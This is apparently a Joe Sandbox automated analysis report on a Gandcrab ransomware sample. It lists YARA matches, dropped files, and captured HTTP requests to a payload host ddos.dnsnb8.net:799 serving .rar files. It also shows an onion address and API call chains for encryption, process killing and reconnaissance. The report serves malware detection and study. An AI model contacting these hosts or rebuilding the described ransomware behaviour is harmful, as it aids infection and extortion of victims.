Source: vSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/&
Source: vSQshX.exe, 00000001.00000000.334129715.00000000030C9000.00000004.00000010.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
Source: vSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar%
Source: SY5DeZW6pz.exe String found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comJames
Source: SciTE.exe.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/scite
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comPraveen
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comYann
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comSteve
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintila.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comDenis
Source: SY5DeZW6pz.exe String found in binary or memory: https://tox.chat/download.html
Source: SY5DeZW6pz.exe String found in binary or memory: https://www.torproject.org/
Source: unknown DNS traffic detected: queries for: ddos.dnsnb8.net
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree, 0_2_0F397EF0
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: SY5DeZW6pz.exe, 00000000.00000000.323985361.000000000178A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: SY5DeZW6pz.exe, type: SAMPLE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection, 0_2_0F396530

System Summary

Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab Payload Author: kevoreilly
Source: vSQshX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SY5DeZW6pz.exe Static PE information: section name: |Zu8
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SY5DeZW6pz.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F391C20 0_2_0F391C20
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F391020 0_2_0F391020
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A9B71 0_2_0F3A9B71
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3983C0 0_2_0F3983C0
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C26D00 1_2_00C26D00
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SY5DeZW6pz.exe Static PE information: Number of sections : 57 > 10
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\vSQshX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: vSQshX.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: SY5DeZW6pz.exe Virustotal: Detection: 81%
Source: SY5DeZW6pz.exe Metadefender: Detection: 65%
Source: SY5DeZW6pz.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SY5DeZW6pz.exe "C:\Users\user\Desktop\SY5DeZW6pz.exe"
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00C2119F
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe File created: C:\Users\user\AppData\Local\Temp\vSQshX.exe
Source: classification engine Classification label: mal100.rans.spre.troj.evad.winEXE@7/17@1/2
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree, 0_2_0F397330
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3946F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification, 0_2_0F3946F0
